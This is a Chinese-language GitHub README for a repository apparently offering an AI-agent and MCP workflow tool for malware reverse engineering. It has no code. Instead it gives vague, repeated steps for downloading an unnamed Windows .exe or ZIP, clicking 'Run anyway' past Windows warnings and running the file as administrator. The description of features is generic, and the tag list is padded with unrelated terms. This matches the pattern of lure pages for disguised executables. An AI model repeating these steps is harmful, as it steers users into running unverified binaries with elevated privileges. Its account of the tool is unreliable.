Melloneyspotty167/agentic-malware-analysis

GitHub: Melloneyspotty167/agentic-malware-analysis

一款基于AI代理和MCP协议的恶意软件逆向分析工作流编排工具,通过引导式流程将反汇编器和逆向工程工具整合为自动化分析管线。

Stars: 0 | Forks: 0

[![下载 / 打开应用](https://img.shields.io/badge/Download-Open%20Repository-blue?style=for-the-badge)](https://github.com/Melloneyspotty167/agentic-malware-analysis) # 🛡️ agentic-malware-analysis - 通过引导式工作流分析恶意软件 ## 📥 下载 使用此链接访问页面并下载应用文件: [https://github.com/Melloneyspotty167/agentic-malware-analysis](https://github.com/Melloneyspotty167/agentic-malware-analysis) 如果您在该页面上看到 **Releases** 部分,请打开它并在那里获取最新的 Windows 文件。如果页面提供的是 ZIP 文件,请将其保存到您的 PC,并保留在您以后能找到的文件夹中,例如 `Downloads` 或 `Desktop`。 ## 🖥️ 此应用的功能 此应用帮助您以清晰、循序渐进的方式完成恶意软件分析任务。它将反汇编器、逆向工程工具和结构化工作流集中在一个地方。 使用它可以: - 检查可疑文件 - 按照既定顺序跟踪分析步骤 - 使用连接 MCP 的工具 - 支持 Claude Code 和 Codex CLI 工作流 - 以结构化格式保存笔记和发现 ## ✅ 所需条件 要在 Windows 上使用,请确保您具备: - Windows 10 或 Windows 11 - 最新版本的 Microsoft Edge 或 Chrome - 足够的可用磁盘空间以存放工具和样本文件 - 在您的 PC 上运行下载文件的权限 - 一个用于存放分析文件的文件夹 如果应用包含额外工具,请将它们与主应用文件保存在同一文件夹中,除非发布页面另有说明。 ## 🚀 在 Windows 上安装 请按顺序执行以下步骤: 1. 打开上面的下载链接。 2. 找到最新的 Windows 版本或应用包。 3. 将文件下载到您的 PC。 4. 如果文件是 ZIP 压缩包,请右键单击并选择 **Extract All**(全部提取)。 5. 打开解压后的文件夹。 6. 找到主应用文件,例如 `.exe` 文件或启动文件。 7. 双击该文件以启动应用。 8. 如果 Windows 请求权限,请选择 **Run anyway**(仍要运行)或 **Yes**(是)。 9. 如果应用打开安装界面,请按照屏幕上的步骤操作。 10. 安装完成后,请将应用文件保留在同一文件夹中。 ## 🧭 首次设置 当您首次打开应用时,请为您的分析文件设置一个简单的工作文件夹。 可以使用如下文件夹: - `Documents\Malware-Analysis` - `Desktop\Analysis-Work` - `Downloads\Samples` 如果应用要求提供工具路径,请将其指向您解压文件的文件夹。如果要求提供分析工作区,请选择您希望用于保存报告、日志和笔记的文件夹。 ## 🔍 主要功能 该应用围绕几个核心部分构建: - **引导式工作流**:按固定顺序执行分析步骤 - **反汇编器支持**:打开并检查文件代码 - **RE 工具集成**:将逆向工程工具集中在一个地方 - **MCP 链接**:通过 MCP 使用连接的工具 - **结构化笔记**:以清晰的格式保存发现 - **CLI 支持**:与 Claude Code 和 Codex CLI 配合使用 - **任务跟踪**:让流程的每一步都清晰可见 ## 🛠️ 使用方法 一种简单的开始方式: 1. 打开应用。 2. 加载您要检查的文件。 3. 选择与您任务匹配的工作流。 4. 让应用引导您完成检查。 5. 查看每个工具的输出。 6. 随时保存笔记。 7. 完成后导出您的发现。 如果您是恶意软件分析的新手,请从一个小的测试文件或已知的安全样本开始。使用工作流视图保持步骤顺序,避免遗漏。 ## 📁 建议的文件夹布局 您可以通过简单的文件夹设置让您的工作易于查找: - `agentic-malware-analysis` - `samples` - `reports` - `screenshots` - `notes` - `exports` 这使得在文件之间移动和保持工作整洁变得更加容易。 ## 🔗 工具连接 此环境设置为通过连接 MCP 的反汇编器和 RE 工具与外部工具配合使用。简而言之,这意味着应用可以在工具之间传递任务,这样您就不必手动逐一打开它们。 您可能会看到对以下各项的支持: - 反汇编工具 - 静态分析工具 - 工作流运行器 - 基于 CLI 的助手 - 报告导出器 如果工具一开始没有连接上,请检查它是否已安装、解压并位于正确的文件夹中。 ## ⚙️ 常见 Windows 问题 如果应用无法启动: - 检查您是否已先解压了 ZIP 文件 - 确保您打开的是主应用文件 - 右键单击该文件并尝试 **Run as administrator**(以管理员身份运行) - 确认 Windows 没有阻止该文件 - 将文件夹移动到简单的路径下,例如 `C:\Tools\agentic-malware-analysis` 如果缺少工具: - 重新打开您解压文件的文件夹 - 检查是否有 tools 或 bin 文件夹 - 确保在解压过程中没有删除任何文件 - 如果文件夹看起来不完整,请重新下载该包 如果应用打开了但看起来是空的: - 确认您加载了样本或目标文件 - 检查是否已设置工作区文件夹 - 查看工作流面板以了解可用任务 ## 🧪 安全使用 此应用用于恶意软件分析工作。请将其保存在受控的文件夹中,并在您有权检查的文件上使用。如果您正在测试未知样本,请在可以重置的本地环境中工作。 ## 🧾 打开后预期会看到的内容 启动后,您可能会看到: - 用于样本的文件选择器 - 工作流列表 - 工具连接面板 - 日志视图 - 笔记区域 - 报告导出选项 该布局应能帮助您从文件导入、分析到报告输出顺畅进行,而无需在许多应用之间来回切换。 ## 📌 文件处理提示 使用简短且不包含特殊字符的文件名。将相关文件保存在同一位置。如果您处理许多样本,请为每个案例创建一个文件夹,并将样本、笔记和输出存放在一起。 良好的文件名示例: - `sample1.exe` - `case_014.zip` - `report_notes.txt` ## 🧰 面向高级用户 如果您已经使用 Claude Code 或 Codex CLI,此环境可以融入您当前的流程。使用它将分析步骤与您的命令行工作连接起来,然后将输出存储在同一个工作区中,以便结果保持一致。 ## 📣 再次下载 如果您以后需要下载页面,请使用此链接: [https://github.com/Melloneyspotty167/agentic-malware-analysis](https://github.com/Melloneyspotty167/agentic-malware-analysis)
标签:Claude Code, Codex CLI, Conpot, DAST, MCP协议, Windows安全, 二进制分析, 云安全监控, 云安全运维, 云资产清单, 人工智能代理, 假设验证, 反汇编工具, 威胁情报, 安全工作流, 开发者工具, 引导式分析, 恶意样本分析, 恶意软件分析, 模型上下文协议, 深度分析, 网络安全, 自动化分析, 证据排名, 跨站脚本, 逆向工程, 隐私保护, 静态分析